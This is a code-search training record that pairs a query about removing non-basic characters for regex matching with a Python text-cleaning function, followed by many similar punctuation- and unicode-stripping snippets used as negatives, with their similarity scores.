text[5:]\n\t\t\ttext = text[:-5] + text[-5:].replace(punctuation, \"\")\n\n\t\t\t# Otherwise, remove the punctuation if not in list specified\n\t\t\tif punctuation not in [\".\", \",\", \"-\", \"--\"]:\n\t\t\t\ttext = text.replace(punctuation, \"\")\n\n\t\treturn text", "def test_drop_punctuation():\n assert TextCleaner().transform([[\"'test!?\"]])[\"corpus\"][0] == \"test\"", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_punctuation(text):\n return re.sub(r'[^\\w]', ' ', text)", "def strip(self, str_text):\n punct_chars = [' ', '.', ',', '!', '?', '&', '\"', \"'\", '-', ':']\n str_text = [i for i in str_text if i not in punct_chars]\n str_text = ''.join(str_text)\n return str_text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def remove_unicode(text):\n regex = r\"(\\\\u....)\"\n text = re.sub(regex, ' ', text)\n return text", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def removePunctuation(self,phrase):\n if(\"normalizeText\" in self._classes):\n return self._normalize.removePunctuation(phrase)", "def remove_punctuation(label):\n\n word = \"\".join(c for c in word if c not in ('!','.',':',',','.','?','\\''))\n return word", "def _do_smart_punctuation(self, text):\r\n if \"'\" in text: # guard for perf\r\n text = self._do_smart_contractions(text)\r\n text = self._opening_single_quote_re.sub(\"&#8216;\", text)\r\n text = self._closing_single_quote_re.sub(\"&#8217;\", text)\r\n\r\n if '\"' in text: # guard for perf\r\n text = self._opening_double_quote_re.sub(\"&#8220;\", text)\r\n text = self._closing_double_quote_re.sub(\"&#8221;\", text)\r\n\r\n text = text.replace(\"---\", \"&#8212;\")\r\n text = text.replace(\"--\", \"&#8211;\")\r\n text = text.replace(\"...\", \"&#8230;\")\r\n text = text.replace(\" . . . \", \"&#8230;\")\r\n text = text.replace(\". . .\", \"&#8230;\")\r\n return text", "def remove_tokens(self, text):\r\n\r\n return text.replace(self.PAD_TK, \"\").replace(self.UNK_TK, \"\")", "def remove_special_chars(text):\n schars = ''.join([a for a in string.punctuation if a not in \".,?\"])\n\n text = re.sub('[%s]' % re.escape(schars), '', text)\n return text", "def stripPunctuation(data):\n for punctuation in punctuations:\n data = data.replace(punctuation, \" \")\n return data", "def replace_punctuation(raw):\r\n\tpunct = set(string.punctuation)\r\n\t\r\n\treturn ''.join([r for r in raw if r not in punct])", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def remove_emoji_punc(text):\n \n allchars = [str for str in text]\n emoji_list = [c for c in allchars if c in emoji.UNICODE_EMOJI]\n clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])\n\n \n s1 = clean_text.replace(u'’', u\"\").replace(\"'\",\"\")\n s1 = re.sub(r'[^a-z0-9 ]+', ' ', s1)\n \n return \" \".join(s1.split())", "def removePunc(text):\r\n\t\r\n\tlistFromText = []\r\n\r\n\tfor word in text.split():\r\n\t\tword = word.strip(string.punctuation) # menghapus tanda baca dalam teks\r\n\t\tlistFromText.append(word)\r\n\r\n\treturn listFromText", "def cleanString(self, s):\r\n s = s.lower()\r\n for x in s: \r\n if x in punctuation:\r\n s = s.replace(x, '')\r\n return s", "def clean_up_text(text):\n text = html.unescape(text)\n return remove_emoji(text)", "def clean_text(text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or is_control(char):\n continue\n if is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_noise(text):\n text1 = re.sub(\"[\\t\\r\\s]\", \" \",text)\n text1 = \" \" + text1\n text2 = re.sub(r\"([ \" + string.punctuation + \"]+)[^a-zA-Z ]+\", \"\\g<1> \", text1)\n return text2", "def removeUnicode(text):\n text = re.sub(r'(\\\\u[0-9A-Fa-f]+)',r'', text) \n text = re.sub(r'[^\\x00-\\x7f]',r'',text)\n return text", "def remove_punctuation(text):\n words = text.split()\n table = str.maketrans(\"\", \"\", string.punctuation)\n return ' '.join([w.translate(table) for w in words])", "def clean_text(text):\n lowercase = tf.strings.lower(text)\n stripped_html = tf.strings.regex_replace(lowercase, \"<br />\", \" \")\n cleaned_punctuation = tf.strings.regex_replace(\n stripped_html, \"[%s]\" % re.escape(string.punctuation), \"\"\n )\n return cleaned_punctuation", "def remove_diacritics(self, text):\n text = re.sub(self._arabic_diacritics, '', text)\n return text", "def remove_punc_alternative(self, sentence):\n regex = re.compile('[%s]' % re.escape(string.punctuation))\n return regex.sub('', sentence)", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def remove_non_alphabetic_text(text):\n return RegexFilters.replace_non_alphabetic_text(text, \"\")", "def desc_cleanser(self, txt):\n # New line issues\n txt = re.sub(r'\\\\n', r' ', txt)\n # Unicode cleanse\n txt = re.sub(r'\\\\u[\\d]{4}', r'', txt)\n # Remaining unicode cleanse\n txt = re.sub(r'\\\\{1,2}\\S+', r' ', txt)\n # Remove remaining non-alphanumeric and spaces\n txt = ''.join([i for i in txt if i.isalnum() or i.isspace() or i in ['.','?','!']])\n # Remove more than a single space\n txt = re.sub(r'\\s+', r' ', txt)\n\n return txt", "def clear(self):\n self.sentence.clear()", "def spacing_punctuation(text):\n for punc in all_punct:\n if punc in text:\n text = text.replace(punc, f' {punc} ')\n return text", "def spacing_punctuation(text):\n for punc in all_punct:\n if punc in text:\n text = text.replace(punc, f' {punc} ')\n return text", "def remove_inner_word_characters(text):\n return RegexFilters.replace_inner_word_characters(text, \"\")", "def remove_diacritics(self, text, onehot_label):\n idx = np.random.randint(0, len(onehot_label))\n prevent_loop = 0\n while onehot_label[idx] == 1 or text[idx] == unidecode.unidecode(text[idx]) or text[idx] in string.punctuation:\n idx = np.random.randint(0, len(onehot_label))\n prevent_loop += 1\n if prevent_loop > 10:\n return False, text, onehot_label\n\n onehot_label[idx] = 1\n text[idx] = unidecode.unidecode(text[idx])\n return True, text, onehot_label", "def remove_unicode_diac(text):\n # Replace diacritics with nothing\n text = text.replace(u\"\\u064B\", \"\") # fatHatayn\n text = text.replace(u\"\\u064C\", \"\") # Dammatayn\n text = text.replace(u\"\\u064D\", \"\") # kasratayn\n text = text.replace(u\"\\u064E\", \"\") # fatHa\n text = text.replace(u\"\\u064F\", \"\") # Damma\n text = text.replace(u\"\\u0650\", \"\") # kasra\n text = text.replace(u\"\\u0651\", \"\") # shaddah\n text = text.replace(u\"\\u0652\", \"\") # sukuun\n text = text.replace(u\"\\u0670\", \"`\") # dagger 'alif\n return text", "def removeNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else '' for i in text])", "def remove_punctuation(sample):\n punctuations = '''!\"&'()*+,-./:;<=>?[\\]^`{|}~'''\n no_punct = \"\"\n for char in sample:\n if char not in punctuations:\n no_punct = no_punct + char\n return no_punct", "def normalize_punctuation(text):\n text = str(text)\n text = text.translate(punct_trans_table)\n return normalize_whitespace(text)", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def stripPunctuation(stri):\n for char in string.punctuation:\n stri = re.sub(r'[\\W]+', ' ', stri) \n\n return stri", "def _remove_asian_punct(cls, sentence: str) ->str:\n sentence = re.sub(cls._ASIAN_PUNCTUATION, '', sentence)\n sentence = re.sub(cls._FULL_WIDTH_PUNCTUATION, '', sentence)\n return sentence", "def removePunctuation(self, words):\n\t\treturn self.__punctuationRegex.sub(' ', words)", "def _remove_custom_chars(self, text: str) -> str:\n patterns = \"|\".join([x for x in self.custom_chars])\n return re.sub(patterns, \"\", str(text), flags=re.IGNORECASE)", "def _clean_up(hadith_text: str) -> str:\n punctuations = ''.join([\n # Collected from https://en.wikipedia.org/wiki/Arabic_script_in_Unicode#Punctuation_and_ornaments\n chr(int('060C', 16)), # ARABIC COMMA\n chr(int('060D', 16)), # ARABIC DATE SEPARATOR\n chr(int('060E', 16)), # ARABIC POETIC VERSE SIGN\n chr(int('060F', 16)), # ARABIC SIGN MISRA\n chr(int('061B', 16)), # ARABIC SEMICOLON\n chr(int('061E', 16)), # ARABIC TRIPLE DOT PUNCTUATION MARK\n chr(int('061F', 16)), # ARABIC QUESTION MARK\n chr(int('066D', 16)), # ARABIC FIVE POINTED STAR\n chr(int('06D4', 16)), # ARABIC FULL STOP\n chr(int('06DD', 16)), # ARABIC END OF AYAH\n chr(int('06DE', 16)), # ARABIC START OF RUB EL HIZB\n chr(int('06E9', 16)), # ARABIC PLACE OF SAJDAH\n chr(int('06FD', 16)), # ARABIC SIGN SINDHI AMPERSAND\n chr(int('FD3E', 16)), # Arabic ornate left parenthesis\n chr(int('FD3F', 16)), # Arabic ornate right parenthesis\n ])\n\n # Removing punctuations\n cleaned_text = re.sub('[' + punctuations + ']', ' ', hadith_text)\n\n # Removing any html markup\n cleaned_text = BeautifulSoup(cleaned_text, 'lxml').text\n\n # Removing multiple consecutive whitespaces, including newlines\n cleaned_text = ' '.join(cleaned_text.split())\n\n return cleaned_text", "def verbalisePunctuation(self):\n for i, strText in enumerate(self.sentencesList):\n #For all punctuation marks\n for regex, value in list(TextRepresentation.PUNCTUATION.items()):\n strText = re.sub(regex, value, strText)\n self.sentencesList[i] = strText", "def remove_punctuation(string):\n return NON_ALNUM.sub(\"\", string)", "def clear_text(self):\n global empty_string\n \n for r in range(1,3):\n for c in range(6):\n self.create_text_under_photo(data = empty_string,r=r,c=c)", "def clear_text(self):\n global empty_string\n \n for r in range(1,3):\n for c in range(6):\n self.create_text_under_photo(data = empty_string,r=r,c=c)", "def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', '<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r", "def clean_text(txt):\n\n cleaned_txt = ''\n for character in txt:\n if character not in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVQXWY ': #punctuation\n character = ''\n cleaned_txt += character\n elif character == character.upper(): #uppercase\n character = character.lower()\n cleaned_txt += character\n else:\n cleaned_txt += character\n return cleaned_txt", "def clean_text(text):\n global cleaned_text\n # remove numbers\n text_nonum = re.sub(r'\\d+', '', text)\n # remove punctuations and convert characters to lower case\n text_nopunct = \"\".join([char.lower() for char in text_nonum if char not in string.punctuation]) \n # substitute multiple whitespace with single whitespace\n # Also, removes leading and trailing whitespaces\n text_no_doublespace = re.sub('\\s+', ' ', text_nopunct).strip()\n #tokenise text\n tokenised_text = text_no_doublespace.split()\n for word in tokenised_text:\n if len(word) == 1:\n tokenised_text.remove(word)\n #if word is a stop word, remove it from the list\n elif word in stopwords.words('english'):\n tokenised_text.remove(word)\n #de-tokenise text\n cleaned_text = ' '.join(tokenised_text)\n return cleaned_text", "def clean_text(text):\n text = str(text).lower()\n text = text.strip(string.punctuation)\n text = re.sub(\"&amp;\", '', text)\n text = re.sub(\"https\", '', text)\n text = re.sub('\\W\\s', '', text)\n text = re.sub('\\s,\\W', '', text)\n text = re.sub('[.!@#$%^&*()_,:;/-]', '', text)\n text = re.sub(\"\\d+\", '', text)\n\n return text", "def clean_non_chinese_symbols(text):\n text = regex.sub('[!!]+', \"!\", text)\n text = regex.sub('[??]+', \"?\", text)\n text = regex.sub(\"[a-zA-Z#$%&\\'()*+,-./:;:<=>@,。★、…【】《》“”‘’[\\\\]^_`{|}~]+\", \" UNK \", text)\n return regex.sub(\"\\s+\", \" \", text)", "def cleanTweetText(tweet):\n twext = excludeTwitterTags(tweet)\n twext = stripPunctuation(twext)\n return twext", "def cleanTweetText(tweet):\n twext = excludeTwitterTags(tweet)\n twext = stripPunctuation(twext)\n return twext", "def remove_punctuation(string_punct):\n return string_punct.translate(str.maketrans('', '', string.punctuation))", "def clear_trash(text):\n for i in TRASH:\n text = text.replace(i, '')\n\n return text", "def remove_punctuation(self, tweet):\n tweet = tweet.replace(\"\\n\", \"\")\n tweet = tweet.replace(\"\\t\", \"\")\n re.sub(r\"http\\S+\", \"\", tweet) # removes links\n\n translator = str.maketrans(\"\", \"\", string.punctuation)\n return tweet.lower().translate(translator)", "def punctuation(self, value):\n value = re.sub('_', ' ', value)\n value = re.sub(',', ' ', value)\n value = re.sub('\\'', ' ', value)\n value = re.sub(r'[^\\w\\s]','', value)\n value = re.sub(r'\\s+',' ',value)\n return value", "def clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")", "def remove_punctuation(a_string):\r\n return a_string.translate(str.maketrans(\"\", \"\", string.punctuation))", "def remove_punctuation(input_string):\r\n return ''.join([c for c in input_string if c not in punctuation])", "def clean(s: str) -> str:\n translator = str.maketrans(\"\", \"\", string.punctuation)\n return s.translate(translator)", "def _clean_text(text):\n rrb = re.compile(\"-RRB-\")\n lrb = re.compile(\"-LRB-\")\n new_text = re.sub(rrb, \" \", text)\n new_text = re.sub(lrb, \" \", new_text)\n\n punct = re.compile(r'[_?!.,]')\n new_text = re.sub(punct, \" \", new_text)\n\n new_text = str(new_text).lower()\n return new_text" ]
[ "0.8042368", "0.7765066", "0.7309863", "0.729243", "0.72679365", "0.7266738", "0.7264455", "0.72357666", "0.7194123", "0.719088", "0.7137011", "0.7126668", "0.7068454", "0.7044288", "0.7034183", "0.70212454", "0.70147127", "0.6998983", "0.6979322", "0.69668394", "0.6941041", "0.6935475", "0.6921085", "0.69145447", "0.6914504", "0.68904227", "0.6876783", "0.686085", "0.6849957", "0.6846275", "0.68142945", "0.6799121", "0.67655903", "0.6763929", "0.67404866", "0.6738909", "0.6730366", "0.6721199", "0.67078465", "0.6704854", "0.6700549", "0.6684403", "0.66767436", "0.66758144", "0.66715115", "0.6653292", "0.66450983", "0.6607567", "0.6607456", "0.6586212", "0.65774554", "0.6566724", "0.6523078", "0.6522571", "0.65159684", "0.65106595", "0.6493691", "0.64723366", "0.6469624", "0.6469624", "0.6457123", "0.64514863", "0.64471996", "0.64305735", "0.642868", "0.6424516", "0.64143807", "0.64143807", "0.64081943", "0.64081943", "0.64081943", "0.64081943", "0.64081943", "0.64081943", "0.6405743", "0.64027226", "0.63784117", "0.6378021", "0.63771963", "0.63710827", "0.6366633", "0.63604695", "0.63604695", "0.6351612", "0.6341843", "0.63376963", "0.63362634", "0.63351184", "0.6335103", "0.6335103", "0.63257647", "0.6321472", "0.63199055", "0.63198954", "0.6317264", "0.63161486", "0.63053197", "0.6305056", "0.6295264" ]
0.7302177
4
Clear the text from any characters that would prevent matching words with regex. These include special punctuations, bullet points, new lines etc.
def clean_text_from_nonbasic_characters(text): text = re.sub(r"([^\u0000-\u007F])", " ", text) text = replace_newline_with_space(text).strip() text = text.replace("_", "") text = clean_text_from_multiple_consecutive_whitespaces(text) return text
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def CLEAN(text):\n return _control_char_re.sub('', text)", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def remove_non_alphabetic_text(text):\n return RegexFilters.replace_non_alphabetic_text(text, \"\")", "def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)", "def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_special_characters_from_text(text) -> str:\n return re.sub(r'[^\\w\\s]', '', text.strip())", "def remove_inner_word_characters(text):\n return RegexFilters.replace_inner_word_characters(text, \"\")", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text", "def non_letter_removal(text):\n return re.sub('[^a-zA-Z]', ' ', text)", "def remove_punct(self,text):", "def _remove_custom_chars(self, text: str) -> str:\n patterns = \"|\".join([x for x in self.custom_chars])\n return re.sub(patterns, \"\", str(text), flags=re.IGNORECASE)", "def clean_text(text):\n text = text.lower()\n text = re.sub(r\"i'm\", 'i am', text)\n text = re.sub(r\"he's\", 'he is', text)\n text = re.sub(r\"she's\", 'she is', text)\n text = re.sub(r\"that's\", 'that is', text)\n text = re.sub(r\"what's\", 'what is', text)\n text = re.sub(r\"where's\", 'where is', text)\n text = re.sub(r\"\\'ll\", ' will', text)\n text = re.sub(r\"\\'ve\", ' have', text)\n text = re.sub(r\"\\'re\", ' are', text)\n text = re.sub(r\"\\'d\", ' would', text)\n text = re.sub(r\"won't\", 'will not', text)\n text = re.sub(r\"can't\", 'cannot', text)\n text = re.sub(r\"[-()\\\"#/@;:<>{}+=~|.?,]\", '', text)\n return text", "def cleanText_letters(text):\n text = re.sub(r\"emoji_(\\w+)\", r\" \", text)\n text = re.sub(r\"hashtag_(\\w+)\", r\" \", text)\n text = re.sub(r\"specialmentioned\", r\" \", text)\n text = re.sub(r\"specialurl\", r\" \", text)\n text = re.sub(\"\\s+\", \" \", text).lower().strip() \n\n if text == \" \" or text == \"\":\n return \"blank_comment\"\n else:\n return text \n \n return text", "def clean_text(text):\n text = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", text)\n text = re.sub(r\"\\'s\", \" \\'s\", text)\n text = re.sub(r\"\\'ve\", \" \\'ve\", text)\n text = re.sub(r\"n\\'t\", \" n\\'t\", text)\n text = re.sub(r\"\\'re\", \" \\'re\", text)\n text = re.sub(r\"\\'d\", \" \\'d\", text)\n text = re.sub(r\"\\'ll\", \" \\'ll\", text)\n text = re.sub(r\",\", \" , \", text)\n text = re.sub(r\"!\", \" ! \", text)\n text = re.sub(r\"\\(\", \" \\( \", text)\n text = re.sub(r\"\\)\", \" \\) \", text)\n text = re.sub(r\"\\?\", \" \\? \", text)\n text = re.sub(r\"\\s{2,}\", \" \", text)\n return text.strip().lower()", "def desc_cleanser(self, txt):\n # New line issues\n txt = re.sub(r'\\\\n', r' ', txt)\n # Unicode cleanse\n txt = re.sub(r'\\\\u[\\d]{4}', r'', txt)\n # Remaining unicode cleanse\n txt = re.sub(r'\\\\{1,2}\\S+', r' ', txt)\n # Remove remaining non-alphanumeric and spaces\n txt = ''.join([i for i in txt if i.isalnum() or i.isspace() or i in ['.','?','!']])\n # Remove more than a single space\n txt = re.sub(r'\\s+', r' ', txt)\n\n return txt", "def _clean_text(text):\n rrb = re.compile(\"-RRB-\")\n lrb = re.compile(\"-LRB-\")\n new_text = re.sub(rrb, \" \", text)\n new_text = re.sub(lrb, \" \", new_text)\n\n punct = re.compile(r'[_?!.,]')\n new_text = re.sub(punct, \" \", new_text)\n\n new_text = str(new_text).lower()\n return new_text", "def clean_text(text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or is_control(char):\n continue\n if is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def text_cleaning(self, text):\n # remove string formatting '\\n' or '\\t'\n tmp_text = re.sub(r'\\n+', '. ', text)\n tmp_text = re.sub(r'\\t+', '. ', text)\n # remove words with non-ascii characters\n tmp_text = \" \".join([word for word in tmp_text.split() if self.is_ascii(word)])\n # remove email address\n tmp_text = \" \".join([word for word in tmp_text.split() if not word.startswith(\"@\")])\n # remove urls\n tmp_text = re.sub(r'http\\S+', '', tmp_text, flags=re.MULTILINE)\n tmp_text = re.sub(r'www\\S+', '', tmp_text, flags=re.MULTILINE)\n # remove punctuation but . (to split sentences)\n cleaned_text = re.sub('[^A-Za-z.,]+', ' ', tmp_text)\n # lowercase\n cleaned_text = cleaned_text.lower()\n\n return cleaned_text", "def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', '<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def clean_text(text):\n text = text.lower()\n all_letters = \"abcdefghijklmnopqrstuvwxyz\"\n text_to_keep = \"\"\n for char in text:\n if char in all_letters:\n text_to_keep += char\n return text_to_keep", "def replace_any_non_letter_or_number_character(text):\n text = text.strip()\n text = re.sub('[^A-Za-z0-9 ]+', '', text)\n return text", "def clean_text(txt):\n\n cleaned_txt = ''\n for character in txt:\n if character not in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVQXWY ': #punctuation\n character = ''\n cleaned_txt += character\n elif character == character.upper(): #uppercase\n character = character.lower()\n cleaned_txt += character\n else:\n cleaned_txt += character\n return cleaned_txt", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def _cleanse(text):\n return ''.join([character for character in text\n if character.isalnum()]).lower()", "def clean_text(text):\n new_text = \"\"\n text = text.lower()\n for character in text:\n if character.isalpha():\n new_text = new_text + character\n return new_text", "def remove_special_chars(text):\n \n text = re.sub(' +', ' ', re.sub('[^A-Za-z ]+', ' ', text).strip())\n return text", "def remove_special_characters(text):\n soup = BeautifulSoup(text, \"html.parser\")\n review = soup.get_text()\n review = r\"[^a-zA-z0-9\\s]\"\n review = re.sub(review, \"\", text)\n return review.lower()", "def clean(text):\n\n # removing paragraph numbers\n text = re.sub('[0-9]+.\\t', '', str(text))\n # removing new line characters\n text = re.sub('\\n ', ' ', str(text))\n text = re.sub('\\n', ' ', str(text))\n # removing apostrophes\n text = re.sub(\"'s\", '', str(text))\n # removing hyphens\n text = re.sub(\"-\", '', str(text))\n text = re.sub(\"— \", '', str(text))\n # removing quotation marks\n text = re.sub('\\\"', '', str(text))\n # removing salutations\n text 